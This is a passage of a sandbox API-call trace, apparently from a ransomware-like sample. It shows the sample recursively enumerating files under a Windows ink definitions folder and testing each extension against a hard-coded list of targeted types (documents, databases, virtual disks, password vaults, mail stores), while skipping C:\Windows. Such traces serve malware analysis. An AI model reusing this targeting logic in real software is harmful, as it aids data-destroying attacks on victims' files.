(in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.925] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", pszFile="base_altgr.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" [0039.925] PathFindExtensionW (pszPath="base_altgr.xml") returned=".xml" [0039.925] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.925] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.925] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.925] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", pszFile="base_ca.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" [0039.925] PathFindExtensionW (pszPath="base_ca.xml") returned=".xml" [0039.925] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.926] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.926] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.926] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", pszFile="base_heb.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" [0039.926] PathFindExtensionW (pszPath="base_heb.xml") returned=".xml" [0039.926] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.926] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.926] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.926] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", pszFile="base_jpn.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml" [0039.926] PathFindExtensionW (pszPath="base_jpn.xml") returned=".xml" [0039.926] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.926] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.926] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.926] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", pszFile="base_kor.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml" [0039.926] PathFindExtensionW (pszPath="base_kor.xml") returned=".xml" [0039.926] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.926] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.926] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.927] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", pszFile="base_rtl.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" [0039.927] PathFindExtensionW (pszPath="base_rtl.xml") returned=".xml" [0039.927] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.927] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.927] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.927] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", pszFile="ja-jp.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml" [0039.927] PathFindExtensionW (pszPath="ja-jp.xml") returned=".xml" [0039.927] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.927] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.927] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.927] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", pszFile="ko-kr.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" [0039.927] PathFindExtensionW (pszPath="ko-kr.xml") returned=".xml" [0039.927] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.927] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.927] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.927] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", pszFile="zh-changjei.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" [0039.927] PathFindExtensionW (pszPath="zh-changjei.xml") returned=".xml" [0039.927] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.927] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.928] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.928] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", pszFile="zh-dayi.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" [0039.928] PathFindExtensionW (pszPath="zh-dayi.xml") returned=".xml" [0039.928] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.928] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.928] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.928] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", pszFile="zh-phonetic.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" [0039.928] PathFindExtensionW (pszPath="zh-phonetic.xml") returned=".xml" [0039.928] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.928] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.928] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 0 [0039.929] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0039.929] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.929] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", pszFile="main.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" [0039.929] PathFindExtensionW (pszPath="main.xml") returned=".xml" [0039.929] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.929] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.929] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.929] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", pszFile="numbers" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers" [0039.930] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers") returned 0x0 [0039.930] PathCombineW (in: pszDest=0x2e4c0a0, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\*" [0039.930] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\*", lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 0x54ade0 [0039.930] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.930] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.930] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers", pszFile="numbase.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" [0039.930] PathFindExtensionW (pszPath="numbase.xml") returned=".xml" [0039.930] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.930] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.930] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 0 [0039.930] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0039.930] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.931] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", pszFile="numbers.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" [0039.931] PathFindExtensionW (pszPath="numbers.xml") returned=".xml" [0039.931] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.931] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.931] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.931] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", pszFile="oskmenu" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu" [0039.931] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu") returned 0x0 [0039.931] PathCombineW (in: pszDest=0x2e4c0a0, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\*" [0039.931] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\*", lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 0x54ade0 [0039.934] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.934] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.934] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu", pszFile="oskmenubase.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" [0039.934] PathFindExtensionW (pszPath="oskmenubase.xml") returned=".xml" [0039.934] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.934] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.935] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 0 [0039.935] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0039.935] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.935] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", pszFile="oskmenu.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" [0039.935] PathFindExtensionW (pszPath="oskmenu.xml") returned=".xml" [0039.935] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.935] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.935] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.935] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", pszFile="osknumpad" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad" [0039.935] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad") returned 0x0 [0039.935] PathCombineW (in: pszDest=0x2e4c0a0, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\*" [0039.935] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\*", lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 0x54ade0 [0039.936] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad", pszFile="osknumpadbase.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" [0039.937] PathFindExtensionW (pszPath="osknumpadbase.xml") returned=".xml" [0039.937] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.937] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.937] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0039.937] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", pszFile="osknumpad.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" [0039.937] PathFindExtensionW (pszPath="osknumpad.xml") returned=".xml" [0039.937] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.937] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.937] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", pszFile="oskpred" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred" [0039.937] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred") returned 0x0 [0039.937] PathCombineW (in: pszDest=0x2e4c0a0, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\*" [0039.938] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\*", lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 0x54ade0 [0039.938] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.938] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.938] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred", pszFile="oskpredbase.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" [0039.938] PathFindExtensionW (pszPath="oskpredbase.xml") returned=".xml" [0039.938] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.938] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.938] FindNextFileW (in: 